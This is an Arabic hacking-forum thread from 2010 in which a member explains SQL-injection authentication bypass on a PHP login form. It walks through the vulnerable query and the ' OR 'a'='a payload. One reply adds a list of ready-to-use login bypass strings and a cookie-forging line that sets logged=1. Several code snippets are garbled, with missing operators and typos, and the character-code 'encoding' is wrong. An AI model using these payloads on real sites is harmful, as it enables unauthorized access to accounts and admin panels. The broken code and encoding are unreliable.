TO DONATE : BTC => 1BU6R1C4AQ77LjLZswQNKFwAupw61i88Kn || PM => U4089661


اهم قوانين :1- منع الردود الباهتة مثل شكرااااا و أخواتها 2- لا يسمح بالمشاحنات الطائفية باآ شكل من الأشكال 3- عدم استعمال الألفاظ التافهة و الكلام البذىء 4- عدم وضع معرفات التواصل الأجتماعى بالردود 5- الأطلاع على كامل القوانين واجب 


العودة   الحماية للأبد -Security 4 Ever > قسم الحماية - Security section > أساسيات حماية وتطوير السكريبتات

أساسيات حماية وتطوير السكريبتات قسم يختص بسد ثغرات السكربتات وتطويرها

 
أدوات الموضوع انواع عرض الموضوع
  #1  
قديم 07-06-2010, 10:06 PM
الصورة الرمزية W3B-SPY
W3B-SPY
عضو جديد
 
حـالة التــواجـد : W3B-SPY غير متواجد حالياً
تاريخ التسجيل: Jun 2010
الجــــنــــــس: ذكـر
المشاركات: 29
شكراً:3
تم شكره 46 مرة في 7 مشاركة
معدل تقييم المستوى: 0
W3B-SPY على طريق التميز
افتراضي شرح ثغرات Auth Bypass



السلام عليكم و رحمة الله و بركاته

هذا اول موضوع لي مع انه الثغرات هذي بسيطة بس قلت معليش نحطو افضل من لا شيء

هذا النوع من الثفرات يسمح لك بالدخول الى الموقع بدون معرفة الباسوورد او اليوزر

وهذا هو ما يجعله خطيرا كم انه يعتبر احد انواع ال sql injection.

الان ناتي لطريقة الاستغلال:

لنفرض ان هذا الكود هو السورس كود الخص ب الملف login.php وهو الكود الذي يتحقق

من الباسوورد :

كود PHP:
<?php
$sql 
"SELECT * FROM users WHERE username='" $_POST['username'] . "' AND
password='" 
$POST_['password'] . "'";
response mysql_query($sql);
?>
الكود هذا يكوم بمقارنة اليوزر و الباس المدخل مع الموجدو في قاعدة البيانات و في حال

التطابق يتم السماح بالدخول الى لوحة التحكم ، الان نحن بحاجة الى التحايل من اجل السماح

لنا بالدخول الى اللوحة ، لنفرض ان المستخدم هو admin كما هو شائع دائم ، نقوم بادخال اليوزر

فقط بدون باسوورد وهو admin فيصبح الكود هكذا :

كود PHP:
<?php
$sql 
"SELECT * FROM users WHERE username='admin' AND
password='" 
$POST_['password'] . "'";
response mysql_query($sql);
?>
وبهذا نكون ححقنا الشرط الاول من الاج عملية الدخول وهو اليوزر ، الان يبقى الباسوورد ،

الان سوف نستعمل الامر OR معناته بالعربي او :D ، نحن لدينا الكود اخاص بالتحقق من الباس هو :

كود PHP:
password=' " . $POST_['password'] . " ' 
والمتغير الموجود في الكود هو الباس الذي سنقومك بادخاله اذا نقوم بوضع هذا الكود في مكان الباسوورد :
كود PHP:
admin ' OR 'a'='
وبالتالي يصبح الكود الخاص بادخال الباس هو :

كود PHP:
password='admin ' OR 'A'='A' 
ويصبح الكود الكلي الخاص بعملية الدخول هو :

كود PHP:

<?php
$sql 
"SELECT * FROM users WHERE username='admin' AND
password='admin ' OR 'A'='A'"
;
response mysql_query($sql);
?>
ومعناه ان هناك شرطان لاتمام عملية الدخول وهما :

1- ان يكون اسم المستخدم هو admin وقد تحقق هذا الشرط كما ذكرت سابقا لاننا

افتضرنا ان الاسم هو admin

2-الشرط الثاني هو ان يكون الباسوورد هو admin في حال كان الباسوورد حقا هو

admin فسوط يتم تسجيل الدخول و ان لم يكون كذلك فسوف يعمل الامر or ويتحقق

من صحة المساواة a=a وبما انها صحيحة رح يتحقق الشرط وتتم عملية الدخول .

ملاحظة بالامكان استعمال الكود على الاسم :

كود PHP:
' or 'a'=a 
بما انه نوع من انواع ال sql injection كما قلت سابقا فرمبا تبادر الى

اذهانكم ان الماجيك كوتس قد يقوم بتعطيلنا هنا ، لذا في حالة ما اذا كان الماجيك كوتس مفعلا

في السيرفر ، فيمكننا تخطي ذلك بسهولة عن طريق تشفير الاكواد و استعمال الدالة

String.fromCharCode() كمثال لتشفير الكود :

كود PHP:
' OR 'a'='
ينتج لنا هذا الكود

كود PHP:
String.fromCharCode(8216327982328216978217326132821697
انتهى الشرح البسيط ،

واعتد انه لا يوجد داعي حتى اقول الحقوق محفوظة ويمنع النقل

بعض الامثلة عن هذه الثغرات :

http://www.exploit-db.com/exploits/12415/
http://www.exploit-db.com/exploits/12691/

تحياتي


 
رد مع اقتباس
  #2  
قديم 07-06-2010, 10:33 PM
الصورة الرمزية DZ-CRYPT
DZ-CRYPT
عضو مميز
 
حـالة التــواجـد : DZ-CRYPT غير متواجد حالياً
تاريخ التسجيل: Apr 2010
مكـان الإقامـة : QSDQSD
الجــــنــــــس: ذكـر
الــهـــوايـــــة: QSDQSDQ
المشاركات: 102
شكراً:81
تم شكره 18 مرة في 6 مشاركة
معدل تقييم المستوى: 10
DZ-CRYPT على طريق التميز
افتراضي

يعطيك الف عافية  

 

 

[SIGPIC][/SIGPIC]
رد مع اقتباس
  #3  
قديم 07-06-2010, 11:51 PM
الصورة الرمزية Sec4ever
Sec4ever
الحماية للأبد
 
حـالة التــواجـد : Sec4ever غير متواجد حالياً
تاريخ التسجيل: Oct 2009
مكـان الإقامـة : الحماية للأبد
الجــــنــــــس: ذكـر
الــهـــوايـــــة: النـــــــــوم :)
المشاركات: 3,749
شكراً:3,342
تم شكره 5,081 مرة في 917 مشاركة
معدل تقييم المستوى: 10
Sec4ever تم تعطيل التقييم
افتراضي

خويا w3b-spy شرح مفهوم و بسيط و مهم .

و بالتوفيق  

 

 

My Adversary completes me,
to disrespect him is to disrespect myself,
thanks to his presence.
رد مع اقتباس
  #4  
قديم 08-06-2010, 01:38 AM
الصورة الرمزية Ip$tr1x
Ip$tr1x
عضو نشيط
 
حـالة التــواجـد : Ip$tr1x غير متواجد حالياً
تاريخ التسجيل: Mar 2010
المشاركات: 58
شكراً:19
تم شكره 16 مرة في 9 مشاركة
معدل تقييم المستوى: 10
Ip$tr1x على طريق التميز
افتراضي

بارك الله فيك خويا شرح رائع

شكرااا لك  
رد مع اقتباس
  #5  
قديم 17-06-2010, 04:52 AM
الصورة الرمزية n4ss1m
n4ss1m
Ş4È´cΘđ3г
 
حـالة التــواجـد : n4ss1m غير متواجد حالياً
تاريخ التسجيل: Mar 2010
مكـان الإقامـة : DZ / 09
الجــــنــــــس: ذكـر
المشاركات: 1,287
شكراً:1,563
تم شكره 1,653 مرة في 343 مشاركة
معدل تقييم المستوى: 11
n4ss1m على طريق التميز
افتراضي

بارك الله فيك

شرح رائع من شخص أروع و حصري

تحياتي,,  

 

 

...
رد مع اقتباس
  #6  
قديم 17-06-2010, 03:04 PM
الصورة الرمزية asl-jazan
asl-jazan
عضو مميز
 
حـالة التــواجـد : asl-jazan غير متواجد حالياً
تاريخ التسجيل: Feb 2010
الجــــنــــــس: ذكـر
المشاركات: 191
شكراً:35
تم شكره 25 مرة في 8 مشاركة
معدل تقييم المستوى: 11
asl-jazan على طريق التميز
افتراضي

يعطيك العافيه يابطل

كنا نستخدم الثغره ومنعرفش كيف تعمل

جزاك الله خير على التوضيح  
رد مع اقتباس
  #7  
قديم 30-06-2010, 09:40 PM
الصورة الرمزية V!ru$_T4ckJ3n
V!ru$_T4ckJ3n
Linux Coder
 
حـالة التــواجـد : V!ru$_T4ckJ3n غير متواجد حالياً
تاريخ التسجيل: May 2010
مكـان الإقامـة : In The H3Ll
الجــــنــــــس: ذكـر
الــهـــوايـــــة: Hacking
المشاركات: 545
شكراً:306
تم شكره 348 مرة في 106 مشاركة
معدل تقييم المستوى: 10
V!ru$_T4ckJ3n على طريق التميز
افتراضي

شكرا لك اخي الكريم
و دائما شروحات ممتازة
بارك الله فيك  
رد مع اقتباس
  #8  
قديم 01-07-2010, 11:24 AM
الصورة الرمزية Ma3sTr0-Dz
Ma3sTr0-Dz
:: Sec4ever#TG ::
 
حـالة التــواجـد : Ma3sTr0-Dz غير متواجد حالياً
تاريخ التسجيل: Nov 2009
الجــــنــــــس: ذكـر
المشاركات: 872
شكراً:816
تم شكره 366 مرة في 106 مشاركة
معدل تقييم المستوى: 10
Ma3sTr0-Dz على طريق التميز
افتراضي

مشكور حبيبي w3b-spy شرح بسيط ومفهوم  

 

 

One Team , One Love , One Heart
Sec4ever
رد مع اقتباس
  #9  
قديم 23-07-2010, 04:53 PM
الصورة الرمزية Mr.Hx
Mr.Hx
عضو جديد
 
حـالة التــواجـد : Mr.Hx غير متواجد حالياً
تاريخ التسجيل: Jul 2010
الجــــنــــــس: ذكـر
المشاركات: 1
شكراً:3
تم شكره مرة واحدة في مشاركة واحدة
معدل تقييم المستوى: 0
Mr.Hx على طريق التميز
افتراضي

لاهنت يابطل وهالنوع من الثغرات مصاب بها مواقع كبيره وثغرات لا يستهان فيها ومع كثرة المحاوله توصل لمرادك

وهذي بعض اكواد الدخول للفائدة

كود:
or 1=1
'or'
' or 1 = 1 --'

'='

'=' #

' or 1=1#

'="

1=1 or ' 

' OR 'a'='a  
بعد التشفير

String.fromCharCode(8216, 32, 79, 82, 32, 8216, 97, 8217, 32, 61, 32, 8216, 97)  
======================
java cood for cookies
javaاستبدال script:استبدال document.cookie = "logged =1";
 
رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ Mr.Hx على المشاركة المفيدة:
  #10  
قديم 21-07-2011, 03:15 AM
الصورة الرمزية i-Hmx
i-Hmx
| Eg-R1z |
 
حـالة التــواجـد : i-Hmx غير متواجد حالياً
تاريخ التسجيل: Jun 2010
مكـان الإقامـة : Infinity
الجــــنــــــس: ذكـر
الــهـــوايـــــة: ruining things
المشاركات: 1,398
شكراً:1,269
تم شكره 6,068 مرة في 754 مشاركة
معدل تقييم المستوى: 10
i-Hmx will become famous soon enough
افتراضي رد: شرح ثغرات Auth Bypass

شرح واضح ومفيد للغايه
مشكور يا برنس  

 

 

"اللهم إغفر لنا ذنوبنا وإسرافنا فى أمرنا وثبت أقدامنا وانصرنا على القوم الكافرين"

Telegram or contact method : PM me || Personal Blog : 1337s.cc
رد مع اقتباس

الكلمات الدلالية (Tags)
auth, bypass, ثغرات, شرح


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
Mesut Man?et Haber V1.0 Auth Bypass Vulnerability Sec4ever قسم جديد ثغرات مواقع الحماية 0 02-05-2010 01:43 PM
Fa Home (Auth Bypass) Vulnerability Sec4ever قسم جديد ثغرات مواقع الحماية 0 30-03-2010 04:24 PM
Fa-Ads (Auth Bypass) Vulnerability Sec4ever قسم جديد ثغرات مواقع الحماية 0 30-03-2010 04:24 PM
FaMarket.V2 (Auth Bypass) Vulnerability Sec4ever قسم جديد ثغرات مواقع الحماية 0 30-03-2010 03:58 PM


الساعة الآن 02:53 AM